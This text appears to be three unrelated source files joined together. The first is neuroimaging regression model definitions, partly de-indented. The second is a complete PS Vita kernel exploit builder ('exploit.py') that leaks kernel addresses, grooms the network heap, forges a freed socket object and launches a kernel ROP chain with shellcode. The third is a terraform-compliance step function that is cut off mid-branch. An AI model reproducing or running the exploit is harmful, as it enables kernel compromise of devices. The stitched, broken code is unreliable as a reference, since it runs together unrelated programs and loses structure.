def model_1102(self):
""" Gains and losses, diminished by (exponential) similarity.
Reward coding inversed. """
data_to_use = ['gl_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1103(self):
""" Gains and losses, diminished by (gaussian) similarity.
Reward coding inversed. """
data_to_use = ['gl_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l into 2 regressors INVERTED
def model_1201(self):
""" Gains and losses, in 2 regressors.
Reward coding inversed. """
data_to_use = ['gl_invert_1', 'gl_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1202(self):
""" Gains and losses, diminished by (exponential) similarity,
in 2 regressors. Reward coding inversed. """
data_to_use = ['gl_exp_invert_1', 'gl_exp_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1203(self):
""" Gains and losses, diminished by (gaussian) similarity,
in 2 regressors. Reward coding inversed. """
data_to_use = ['gl_gauss_invert_1', 'gl_gauss_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding INVERTED
# RPE
def model_1301(self):
""" RPE - derived from accuracy. Reward coding inversed."""
data_to_use = ['rpe_acc_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1302(self):
""" RPE - derived from accuracy diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['rpe_acc_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1303(self):
""" RPE - derived from accuracy diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['rpe_acc_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# Acc coding
## VALUE
def model_1401(self):
""" Value - derived from accuracy. Reward coding inversed."""
data_to_use = ['value_acc_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1402(self):
""" Value - derived from accuracy diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['value_acc_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1403(self):
""" Value - derived from accuracy diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['value_acc_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## RPE
def model_1601(self):
""" RPE - derived from gains and loses. Reward coding inversed. """
data_to_use = ['rpe_gl_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1602(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1603(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding
## VALUE
def model_1701(self):
""" Value - derived from gains and losses. Reward coding inversed. """
data_to_use = ['value_gl_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1702(self):
""" Value - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_exp_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1703(self):
""" Value - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['value_gl_gauss_invert']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## RPE
def model_1801(self):
""" RPE - derived from gains and loses. Reward coding inversed. """
data_to_use = ['rpe_gl_invert_1', 'rpe_gl_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1802(self):
""" RPE - derived from gains and losses diminished by (exponential)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_exp_invert_1', 'rpe_gl_exp_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1803(self):
""" RPE - derived from gains and losses diminished by (gaussian)
similarity. Reward coding inversed. """
data_to_use = ['rpe_gl_gauss_invert_1', 'rpe_gl_gauss_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## VALUE
def model_1901(self):
""" Value - derived from gains and losses. Reward coding inversed. """
data_to_use = ['value_gl_invert_1', 'value_gl_invert_0']
self.data['meta']['dm'] = data_to_use
self.create_dm_param(names=data_to_use, orth=False, box=False)
self.fit(norm='zscore')
def model_1902(self):
    """Value from gains and losses diminished by (exponential) similarity,
    split into two regressors; reward coding inverted."""
    regressors = ['value_gl_exp_invert_1', 'value_gl_exp_invert_0']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_1903(self):
    """Value from gains and losses diminished by (gaussian) similarity,
    split into two regressors; reward coding inverted."""
    self.data['meta']['dm'] = ['value_gl_gauss_invert_1', 'value_gl_gauss_invert_0']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
# POSITIVE CODING
# --
# Gains and losses, positive-only coding
def model_2001(self):
    """Single gains-and-losses regressor; reward coding positive only."""
    regressors = ['gl_pos']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_2002(self):
    """Gains and losses diminished by (exponential) similarity;
    reward coding positive only."""
    self.data['meta']['dm'] = ['gl_exp_pos']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
def model_2003(self):
    """Gains and losses diminished by (gaussian) similarity;
    reward coding positive only."""
    regressors = ['gl_gauss_pos']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
# --
# g/l into 2 regressors pos only
def model_2101(self):
    """Gains and losses in two regressors; reward coding positive only."""
    self.data['meta']['dm'] = ['gl_pos_1', 'gl_pos_0']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
def model_2102(self):
    """Gains and losses diminished by (exponential) similarity, in two
    regressors; reward coding positive only."""
    regressors = ['gl_exp_pos_1', 'gl_exp_pos_0']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_2103(self):
    """Gains and losses diminished by (gaussian) similarity, in two
    regressors; reward coding positive only."""
    self.data['meta']['dm'] = ['gl_gauss_pos_1', 'gl_gauss_pos_0']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
# --
# g/l coding
## RPE
def model_2501(self):
    """Single RPE regressor derived from gains and losses;
    reward coding positive only."""
    regressors = ['rpe_gl_pos']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_2502(self):
    """RPE from gains and losses diminished by (exponential) similarity;
    reward coding positive only."""
    self.data['meta']['dm'] = ['rpe_gl_exp_pos']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
def model_2503(self):
    """RPE from gains and losses diminished by (gaussian) similarity;
    reward coding positive only."""
    regressors = ['rpe_gl_gauss_pos']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
# --
# g/l coding
## VALUE
def model_2601(self):
    """Single value regressor derived from gains and losses;
    reward coding positive only."""
    self.data['meta']['dm'] = ['value_gl_pos']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
def model_2602(self):
    """Value from gains and losses diminished by (exponential) similarity;
    reward coding positive only."""
    regressors = ['value_gl_exp_pos']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_2603(self):
    """Value from gains and losses diminished by (gaussian) similarity;
    reward coding positive only."""
    self.data['meta']['dm'] = ['value_gl_gauss_pos']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## RPE
def model_2701(self):
    """RPE derived from gains and losses, split into two regressors;
    reward coding positive only."""
    regressors = ['rpe_gl_pos_1', 'rpe_gl_pos_0']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_2702(self):
    """RPE from gains and losses diminished by (exponential) similarity,
    split into two regressors; reward coding positive only."""
    self.data['meta']['dm'] = ['rpe_gl_exp_pos_1', 'rpe_gl_exp_pos_0']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
def model_2703(self):
    """RPE from gains and losses diminished by (gaussian) similarity,
    split into two regressors; reward coding positive only."""
    regressors = ['rpe_gl_gauss_pos_1', 'rpe_gl_gauss_pos_0']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
# --
# g/l coding, into 2 regressors
## VALUE
def model_2801(self):
    """Value derived from gains and losses, split into two regressors;
    reward coding positive only."""
    self.data['meta']['dm'] = ['value_gl_pos_1', 'value_gl_pos_0']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
def model_2802(self):
    """Value from gains and losses diminished by (exponential) similarity,
    split into two regressors; reward coding positive only."""
    regressors = ['value_gl_exp_pos_1', 'value_gl_exp_pos_0']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_2803(self):
    """Value from gains and losses diminished by (gaussian) similarity,
    split into two regressors; reward coding positive only."""
    self.data['meta']['dm'] = ['value_gl_gauss_pos_1', 'value_gl_gauss_pos_0']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
# --
# CONTROL MODELS
def model_29(self):
    """Control model: outcome similarity (exponential) alone."""
    regressors = ['exp']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_30(self):
    """Control model: outcome similarity (gaussian) alone."""
    self.data['meta']['dm'] = ['gauss']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
def model_31(self):
    """Control model: behavioral/category responses as separate
    regressors."""
    regressors = ['resp1', 'resp6']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_32(self):
    """Control model: outcome and contra-outcome similarities
    (exponential) as separate regressors."""
    self.data['meta']['dm'] = ['exp', 'exp_opp']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
def model_33(self):
    """Control model: outcome and contra-outcome similarities (gaussian)
    as separate regressors."""
    regressors = ['gauss', 'gauss_opp']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
def model_34(self):
    """Control model: Gabor angle parameter alone."""
    self.data['meta']['dm'] = ['angle']
    self.create_dm_param(names=self.data['meta']['dm'], orth=False, box=False)
    self.fit(norm='zscore')
def model_35(self):
    """Control model: Gabor width parameter alone."""
    regressors = ['width']
    self.data['meta']['dm'] = regressors
    self.create_dm_param(names=regressors, orth=False, box=False)
    self.fit(norm='zscore')
|
<filename>urop/exploit.py
#!/usr/bin/env python3
from os import sys, path
sys.path.append(path.join(path.dirname(path.dirname(path.abspath(__file__))), "build"))
from target_360 import Rop360, G, F
from util import p32, p8
from rop import Ret, Load
from krop import krop
from sys import argv, exit
# --- Exploit tuning parameters ------------------------------------------
# NOTE(review): the offsets/counts below are firmware-specific and were
# presumably derived by reverse engineering the target build — verify
# against the matching firmware before changing any of them.
thread_attr = 0x10000100        # attr argument passed to sceKernelCreateThread
stack_size = 0x2000             # helper ROP thread stack size in bytes
need_sockets = 80               # sockets sprayed for heap grooming
user_ropchain_len = 0x100       # bytes reserved per micro ROP chain
ldm_buf_size = 7 * 4            # seven 32-bit words for the LDM register block
need_dumps = 11                 # net dumps used to shape the heap
stack_shellcode_offset = 0x300  # shellcode offset inside the our_data buffer
sysmem_shellcode_offset = 0x27640  # NOTE(review): unused in this script
stack_rop_offset = 4            # kernel ROP chain offset inside our_data
kstack_offset_to_data = 1784    # delta from leaked kernel stack to planted data
normal_args = (2, 1, 0)         # ordinary socket() arguments
special_args = (17, 3, 0)       # socket() arguments for the victim socket
class RopThread:
    """A helper kernel-callable thread driven by a micro ROP chain.

    The thread is created with sceKernelCreateThread pointing at an LDM
    gadget; go() copies the queued micro ROP words into the thread's user
    stack and starts it so the LDM gadget pivots SP into that chain.
    """

    def __init__(self, rop):
        # Micro ROP words queued by call()/infloop(); emitted by go().
        self.microrop = []
        self.rop = rop

    def create(self):
        """Create the thread and pre-allocate the buffers go() needs."""
        r = self.rop
        c = r.caller
        d = r.data
        self.thread_id = r.pre_alloc_var(4)
        self.thread_info = r.pre_alloc_var(0x80)
        self.stack_base = r.pre_alloc_var(4)
        self.user_ropchain = r.pre_alloc_var(user_ropchain_len)
        self.ldm_buf = r.pre_alloc_var(ldm_buf_size)
        # Entry point is the LDM gadget; the arg block passed at start time
        # (ldm_buf) supplies the registers it loads, including the new SP/PC.
        c.sceKernelCreateThread(d.empty_str, G.ldm_r1_stuff, thread_attr, stack_size, 0, 0, 0)
        c.store(Ret, self.thread_id)
        # 0x7C is presumably the size field GetThreadInfo expects — TODO confirm.
        c.store(0x7C, self.thread_info)
        c.sceKernelGetThreadInfo(Load(self.thread_id), self.thread_info)
        # some free space for function calls
        # (+0x34 looks like the stack-pointer field of the info struct —
        #  NOTE(review): confirm the offset against the SDK layout)
        c.add(Load(self.thread_info + 0x34), 0x1000)
        c.store(Ret, self.stack_base)

    def call(self, func, a1=0, a2=0, a3=0, a4=0, last_r4=0):
        """Queue a 4-argument function call into the micro ROP chain."""
        self.microrop += [
            G.pop_r0_to_r5,   # load r0..r3 with the args, r4 with func
            a1,
            a2,
            a3,
            a4,
            func,
            0,                # r5 filler
            G.blx_r4_pop_r4,  # call func, then refill r4
            last_r4,
        ]

    def infloop(self):
        """Queue an infinite loop so the thread parks after its work."""
        self.microrop.append(G.infloop)

    def go(self):
        """Write the micro ROP chain into the thread stack and start it."""
        r = self.rop
        c = r.caller
        addr = self.user_ropchain
        for word in self.microrop:
            c.store(word, addr)
            addr += 4
        # copy user ropchain into user stack
        c.memcpy(Load(self.stack_base), self.user_ropchain, user_ropchain_len)
        # set up args for LDM user thread stack pivot:
        # word 5 -> new SP (the copied chain), word 6 -> pop {pc} to kick off
        c.store(Load(self.stack_base), self.ldm_buf+5*4)
        c.store(G.pop_pc, self.ldm_buf+6*4)
        c.sceKernelStartThread(Load(self.thread_id), ldm_buf_size, self.ldm_buf)
def create_dumps(rop, start, end, step, use_repeat=False):
    """
    Tries to create dumps in range [start; end], every `step` bytes,
    counting DOWN (so `end < start` is required).

    Generally only one allocation is expected to succeed; this is used to
    claim empty space in the net heap.

    :param rop: the Rop360 chain being built
    :param use_repeat: if True, emit a compact repeated micro-chain that
        decrements the size in place instead of unrolling one
        sceNetDumpCreate_svc call per size (keeps the chain small).
    """
    r = rop
    c = rop.caller
    d = rop.data
    if use_repeat:
        # Size of dump to allocate (stored in ROP data, decremented in place)
        size = r.pre_alloc_var(p32(start))
        # How many iterations we need to perform
        iters = (start - end) // step
        r.repeat(iters, [
            # r1 = [size]
            G.pop_r1_pc,
            size,
            G.pop_r5_r6_r7_r8_sb_pc,
            0,
            0,
            0,
            0,
            G.pop_pc,  # sb := pop_pc so the blx below returns into the chain
            G.ldr_r1_r1_blx_sb,
            # r0 = empty_str
            G.pop_r0_pc,
            d.empty_str,
            # r2 = 0
            G.pop_r2_pc,
            0,
            # call the function
            G.pop_r4_pc,
            F.sceNetDumpCreate_svc,
            G.blx_r4_pop_r4_pc,
            0,
            # r0 = [size]
            G.pop_r0_pc,
            size,
            G.ldr_r0_r0_pop_r4_pc,
            0,
            # r0 -= step (two's-complement add)
            G.pop_r1_pc,
            (-step) & 0xFFFFFFFF,
            G.pop_r4_pc,
            G.adds_r0_r1,
            G.blx_r4_pop_r4_pc,
            0,
            # [size] = r0
            G.pop_r1_pc,
            size,
            G.str_r0_r1_pop_r4,
            0,
        ])
    else:
        # Unrolled variant: one direct call per candidate size.
        for dump_sz in range(start, end-1, -step):
            c.sceNetDumpCreate_svc(d.empty_str, dump_sz, 0)
def make_rop(kx_loader, second_payload):
    """Build the complete usermode ROP chain for the kernel exploit.

    Stages (as visible below): leak the sysmem base via devctl, plant data
    into kernel stack memory from a helper thread, groom the net heap with
    sockets/dumps, trigger the vulnerable ioctl from a second helper
    thread, overwrite a freed socket object via sceNetSyscallControl, and
    finally kick off the kernel ROP chain that runs the kx_loader blob.

    :param kx_loader: kernel shellcode-loader blob (copied into our_data)
    :param second_payload: follow-up payload embedded in the ROP data area
    :return: the compiled Rop360 object
    """
    r = Rop360()
    r.assume_null_init = True
    c = r.caller
    d = r.data
    # Named buffers in the ROP data area; sizes/contents as required below.
    r.pre_alloc_data(
        ioctl=0x400,
        sysmem_base=4,
        rop_thread_id=4,
        sockets=need_sockets*4,
        args_buf_first=0x10,
        args_buf_second=0x10,
        open_device_name="molecule0:",
        device_name="sdstor0:",
        command="gcd-lp-ign-gamero",
        our_data=0x1000,
        tester=4,
        pret=4,
        empty_str="",
        dumps_to_delete=need_dumps*4,
        dump_to_free=4,
        mybuf=0x100,
        krop=0x400,
        kx_loader_addr=4,
        kx_loader=kx_loader,
        second_payload = second_payload,
        kernel_stack_base=4,
    )
    c.sceIoOpen(d.open_device_name, 0, 0)
    # only leak sysmem from this call
    c.sceIoDevctl(d.device_name, 5, d.command, 0x14, d.ioctl, 0x3FF)
    # NOTE(review): 0x3D4/0x5747 are firmware-specific leak offsets.
    c.add(Load(d.ioctl+0x3D4), -0x5747)
    c.store(Ret, d.sysmem_base)
    # -----8<-----------------------------------------------------------------------
    # Helper thread that plants our_data into kernel stack memory.
    plant = RopThread(r)
    plant.create()
    c.store(0x14, d.args_buf_first+0)
    c.store(d.ioctl, d.args_buf_first+4)
    c.store(0x3FF, d.args_buf_first+8)
    c.store(0x400, d.args_buf_second+0)
    c.store(0, d.args_buf_second+4)
    c.store(0, d.args_buf_second+8)
    # sceIoOpen to populate kernel stack
    plant.call(F.sceIoOpen, d.open_device_name)
    # first devctl to leak stack/sysmem addr
    plant.call(F.sceIoDevctl_svc, d.device_name, 5, d.command, d.args_buf_first)
    # delay to sync our two threads
    plant.call(F.sceKernelDelayThread, 200 * 1000)
    # second devctl to plant our data into kmem
    plant.call(F.sceIoDevctl_svc, d.device_name, 5, d.our_data, d.args_buf_second)
    plant.infloop()
    plant.go()
    # ----->8-----------------------------------------------------------------------
    # sleep 0.1s
    c.sceKernelDelayThread(100 * 1000)
    c.add(Load(d.ioctl+0x3C4), -0xABC)
    c.store(Ret, d.kernel_stack_base)
    # set up data for kernel
    c.add(Load(d.sysmem_base), 0x1e460) # ldm R0, {R4,R10,R12,SP,PC}
    c.store(Ret, d.our_data) # future function ptr
    # layout: [ ldm_gadget ] [ kernel ropchain .... ] ... [ payload? ]
    # remember: we only have 0x400 bytes, and the less we use the better
    c.add(Load(d.kernel_stack_base), kstack_offset_to_data)
    c.add(Ret, stack_shellcode_offset)
    c.store(Ret, d.kx_loader_addr)
    # Emit the kernel ROP chain into d.krop, then place it inside our_data.
    krop(r)
    c.memcpy(d.our_data + stack_rop_offset, d.krop, 0x300)
    # set up shellcode
    c.memcpy(d.our_data + stack_shellcode_offset, d.kx_loader, 0x400)
    # after the plant thread wakes up, it should copy our_data into kernel stack
    # set up overwritten socket structure
    c.add(Load(d.kernel_stack_base), 1756)
    c.store(Ret, d.mybuf + 6 * 4) # vptr
    c.add(Load(d.kernel_stack_base), kstack_offset_to_data)
    c.add(Ret, stack_rop_offset)
    c.store(Ret, d.mybuf + 3 * 4) # sp
    c.add(Load(d.sysmem_base), 0x347) # pop {pc} to kick off the ropchain
    c.store(Ret, d.mybuf + 4 * 4)
    # create and set up rop thread that will call vulnerable syscall
    vuln = RopThread(r)
    vuln.create()
    # create a lot of sockets
    for x in range(need_sockets):
        c.socket(d.empty_str, *normal_args)
        c.store(Ret, d.sockets + 4 * x)
    c.socket(d.empty_str, *normal_args)
    c.socket(d.empty_str, *special_args)
    c.store(Ret, d.tester)
    c.socket(d.empty_str, *normal_args)
    vuln.call(F.sceNetSyscallIoctl, Load(d.tester), 0x10007300, 0, 0, d.pret)
    # Store the ioctl return value so we can check success later.
    vuln.microrop += [
        G.str_r0_r4_pop_r4,
        0,
    ]
    vuln.infloop()
    for x in range(need_dumps):
        c.sceNetDumpCreate_svc(d.empty_str, 0xF00, 0)
        c.store(Ret, d.dumps_to_delete + 4 * x)
    c.sceNetDumpCreate_svc(d.empty_str, 0x2000, 0)
    c.store(Ret, d.dump_to_free)
    # free some memory and create holes
    for x in range(0, need_dumps, 2):
        c.sceNetDumpDestroy(Load(d.dumps_to_delete + 4 * x))
    create_dumps(r, 0x100000, 0xF40, 0x10, use_repeat=True)
    # it should hang
    vuln.go()
    c.sceKernelDelayThread(100 * 1000)
    # free sockets
    for x in range(0, need_sockets, 2):
        c.sceNetSyscallClose(Load(d.sockets + 4 * x))
    c.sceNetSyscallClose(Load(d.tester))
    # Spray the forged socket structure over the freed allocations.
    for x in range(0x20):
        c.sceNetSyscallControl(0, 0x30000000, d.mybuf, 0xFC)
    c.sceNetDumpDestroy(Load(d.dump_to_free))
    c.sceKernelDelayThread(100 * 1000)
    # on success this will remain at 0, on error it will be -22
    c.add(Load(d.pret), G.bx_lr)
    # we continue user rop when kernel payload triggers and crash webkit otherwise
    # so it has a chance to try again
    r.call_r0()
    # free the dumps now, we need net memory for http stuff in usermode to work!
    for dump_id in range(0x1770, 0x1791):
        c.sceNetDumpDestroy(dump_id)
    r.infloop()
    r.compile()
    return r
def main():
    """CLI entry point: ``exploit.py kx-loader second-payload output-bin``.

    Reads the two payload blobs, builds the ROP chain, and writes the
    compiled ROP words followed by the relocation bytes (with trailing
    zeros stripped) to the output file. Prints the ROP word count on
    stdout and returns 0 on success, 1 on usage error.
    """
    if len(argv) != 4:
        print("Usage: exploit.py kx-loader second-payload output-henkaku-bin")
        return 1
    with open(argv[1], "rb") as fin:
        kx_loader = fin.read()
    with open(argv[2], "rb") as fin:
        second_payload = fin.read()
    rop = make_rop(kx_loader, second_payload)
    # We're initialized to zero, no need to keep trailing relocs that are 0.
    relocs = rop.compiled_relocs[:]
    # Guard against an all-zero reloc list: the original bare
    # `while relocs[-1] == 0` raised IndexError once the list emptied.
    while relocs and relocs[-1] == 0:
        del relocs[-1]
    with open(argv[3], "wb") as fout:
        for word in rop.compiled_rop:
            fout.write(p32(word))
        for reloc in relocs:
            fout.write(p8(reloc))
    # Print number of words to stdout so the embedding tooling can use it.
    print(len(rop.compiled_rop))
    return 0
if __name__ == "__main__":
exit(main())
|
<reponame>jrsherry/terraform-compliance<filename>terraform_compliance/steps/given/i_have_name_section_configured.py
# -*- coding: utf-8 -*-
from radish import world
from terraform_compliance.common.bdd_tags import look_for_bdd_tags
from terraform_compliance.common.helper import (
get_resource_address_list_from_stash,
find_root_by_key,
remove_mounted_resources,
transform_asg_style_tags,
convert_resource_type,
recursive_jsonify
)
from terraform_compliance.extensions.ext_radish_bdd import skip_step
import re
def i_have_name_section_configured(_step_obj, name, type_name='resource', _terraform_config=world):
    '''
    Finds given resource or variable by name and returns it. Skips the step
    (and all further steps of the scenario) if it is not found.

    Stashes the matched objects on ``_step_obj.context`` (``stash``,
    ``cumulative_stash``, ``addresses``, ``type``, ``name``,
    ``property_name``) for later steps to consume.

    :param _step_obj: Internal, step object for radish.
    :param name: String of the name of the resource_type or variable.
    :param type_name: String of the type, either resource(s), variable(s),
        output(s), provider(s) or data(s)
    :param _terraform_config: Internal, terraform configuration.
    :return: True when something was found; otherwise the step is skipped.
    '''
    assert (type_name in ['resource', 'resources',
                          'variable', 'variables',
                          'output', 'outputs',
                          'provider', 'providers',
                          'data', 'datas']), \
        '{} configuration type does not exist or not implemented yet. ' \
        'Use resource(s), provider(s), variable(s), output(s) or data(s) instead.'.format(type_name)

    # Normalise plural forms ("resources" -> "resource", etc.).
    if type_name.endswith('s'):
        type_name = type_name[:-1]

    # Process the tags
    _step_obj = look_for_bdd_tags(_step_obj)
    match = _step_obj.context.match

    if not hasattr(_step_obj.context, 'cumulative_stash'):
        _step_obj.context.cumulative_stash = []

    # NOTE: branch ORDER is semantic — the wildcard-name branches below must
    # be checked before the generic per-type lookups at the bottom.
    if name in ('a resource', 'any resource', 'resources'):
        # Wildcard: stash every raw resource.
        _step_obj.context.type = type_name
        _step_obj.context.name = name
        _step_obj.context.stash = recursive_jsonify([obj for key, obj in _terraform_config.config.terraform.resources_raw.items()])
        _step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
        _step_obj.context.addresses = get_resource_address_list_from_stash(_step_obj.context.stash)
        _step_obj.context.property_name = type_name
        return True

    elif name in ('an output', 'any output', 'outputs'):
        # Wildcard: stash every configured output.
        _step_obj.context.type = 'output'
        _step_obj.context.name = name
        _step_obj.context.stash = recursive_jsonify([obj for key, obj in _terraform_config.config.terraform.configuration['outputs'].items()])
        _step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
        _step_obj.context.addresses = get_resource_address_list_from_stash(_terraform_config.config.terraform.configuration['outputs'])
        _step_obj.context.property_name = 'output'
        return True

    elif name in ('a variable', 'any variable', 'variables'):
        # Wildcard: stash every configured variable.
        _step_obj.context.type = 'variable'
        _step_obj.context.name = name
        _step_obj.context.stash = recursive_jsonify([obj for key, obj in _terraform_config.config.terraform.configuration['variables'].items()])
        _step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
        _step_obj.context.addresses = 'variable'
        _step_obj.context.property_name = 'variable'
        return True

    elif name.startswith('resource that supports'):
        # e.g. "resource that supports tags": collect every resource whose
        # type exposes the given property anywhere in its raw configuration.
        filter_property = re.match(r'resource that supports (.*)', name).group(1)
        resource_types_supports_tags = find_root_by_key(_terraform_config.config.terraform.resources_raw,
                                                        filter_property,
                                                        return_key='type')
        resource_list = []
        for resource_type in resource_types_supports_tags:
            # Issue-168: Mounted resources causes problem on recursive searching for resources that supports tags
            # We are removing all mounted resources here for future steps, since we don't need them for
            # tags checking.
            found_resources = remove_mounted_resources(_terraform_config.config.terraform.find_resources_by_type(resource_type, match))
            found_resources = transform_asg_style_tags(found_resources)
            resource_list.extend(found_resources)

        if resource_list:
            _step_obj.context.type = type_name
            _step_obj.context.name = name
            _step_obj.context.stash = recursive_jsonify(resource_list)
            _step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
            _step_obj.context.addresses = get_resource_address_list_from_stash(resource_list)
            _step_obj.context.property_name = type_name
            return True

    elif type_name == 'resource':
        # Lookup by (possibly aliased) resource type.
        name = convert_resource_type(name)
        resource_list = _terraform_config.config.terraform.find_resources_by_type(name, match)

        if resource_list:
            _step_obj.context.type = type_name
            _step_obj.context.name = name
            _step_obj.context.stash = recursive_jsonify(resource_list)
            _step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
            _step_obj.context.addresses = get_resource_address_list_from_stash(resource_list)
            _step_obj.context.property_name = type_name
            return True

    elif type_name == 'variable':
        found_variable = match.get(_terraform_config.config.terraform.variables, name, None)

        if found_variable:
            _step_obj.context.type = type_name
            _step_obj.context.name = name
            # NOTE(review): wrapped in a list here, unlike the 'output'
            # branch below — presumably intentional; confirm upstream.
            _step_obj.context.stash = [recursive_jsonify(found_variable)]
            _step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
            _step_obj.context.addresses = name
            _step_obj.context.property_name = type_name
            return True

    elif type_name == 'output':
        found_output = match.get(_terraform_config.config.terraform.outputs, name, None)

        if found_output:
            _step_obj.context.type = type_name
            _step_obj.context.name = name
            _step_obj.context.stash = recursive_jsonify(found_output)
            _step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
            _step_obj.context.addresses = name
            _step_obj.context.property_name = type_name
            return True

    elif type_name == 'provider':
        found_provider = _terraform_config.config.terraform.get_providers_from_configuration(name, match)

        if found_provider:
            _step_obj.context.type = type_name
            _step_obj.context.name = name
            _step_obj.context.stash = recursive_jsonify(found_provider)
            _step_obj.context.cumulative_stash.extend(_step_obj.context.stash)
            _step_obj.context.addresses = name
            _step_obj.context.address = name
            _step_obj.context.property_name = type_name
            return True

    elif type_name == 'data':
        name = convert_resource_type(name)
        data_list = _terraform_config.config.terraform.find_data_by_type(name, match)

        if data_list:
